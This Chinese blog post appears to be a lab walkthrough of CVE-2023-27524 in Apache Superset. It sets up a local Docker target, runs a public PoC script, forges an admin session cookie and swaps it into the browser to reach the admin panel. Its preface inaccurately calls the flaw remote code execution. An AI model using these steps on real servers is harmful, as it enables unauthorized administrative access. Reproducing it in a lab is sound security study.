ApacheSuperset CVE-2023-27524

前言:CVE-2023-27524 是一种远程代码执行漏洞,攻击者通过该漏洞可在受影响系统上执行任意代码,从而获得未授权访问权

CVE-2023-27524 GitHubhttps://github.com/horizon3ai/CVE-2023-27524

任务一 代理 | 拉取镜像

复制代码
vi /etc/proxychains4.conf
//最下面修改真机IP端口
复制代码
docker compose up -d
docker ps
//拉取成功后查看8088就是服务器端口

任务二 python 问题解决

复制代码
python3 CVE-2023-27524.py --url 192.168.247.139:8088 --id 1 --validate
//发现缺少 'flask_unsign'
复制代码
python3 -m venv myenv
source myenv/bin/activate
//创建并激活一个虚拟环境

//安装 flask-unsign
proxychains4 pip install flask-unsign

任务三 生成cookie

复制代码
python3 CVE-2023-27524.py --url 192.168.247.139:8088 --id 1 --validate
//下面这样就是安装成功了

【eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.aEAshA.TmTRYFed6TPxFmeOmLRrQAXX3vc】

任务四 替换cookie

复制代码
//随便下载一个cookie的小插件 我用的是cookieManage
复制代码
//替换进去保存,刷新一下就进管理界面了

任务五 实验结束

相关推荐
pingao14137816 分钟前
加热激光雪深监测站守护冬季道路安全
安全
Bug.ink1 小时前
BUUCTF——WEB(3)
web安全·网络安全·buuctf
Bruce_Liuxiaowei2 小时前
Nmap主机发现与在线主机提取实用指南
服务器·网络·安全
一杯咖啡的时间2 小时前
2021年与2025年OWASP Top 10
网络·安全·web安全
LiYingL2 小时前
AlignGuard-LoRA:一种结合了高效微调和安全保护的新正则化方法
服务器·安全
墨痕诉清风3 小时前
java漏洞集合工具(Struts2、Fastjson、Weblogic(xml)、Shiro、Log4j、Jboss、SpringCloud)
xml·java·struts·安全·web安全·spring cloud·log4j
Z_renascence3 小时前
web 260-web270
web安全·网络安全
卓豪终端管理3 小时前
构建主动免疫:终端零日漏洞防护新体系
网络·安全·web安全
鱼跃新知3 小时前
通过Cursor分析js安全初体验
安全
莫叫石榴姐4 小时前
ast 在 Dify 工作流中解析 JSON 格式数据的深度解析
大数据·网络·安全·json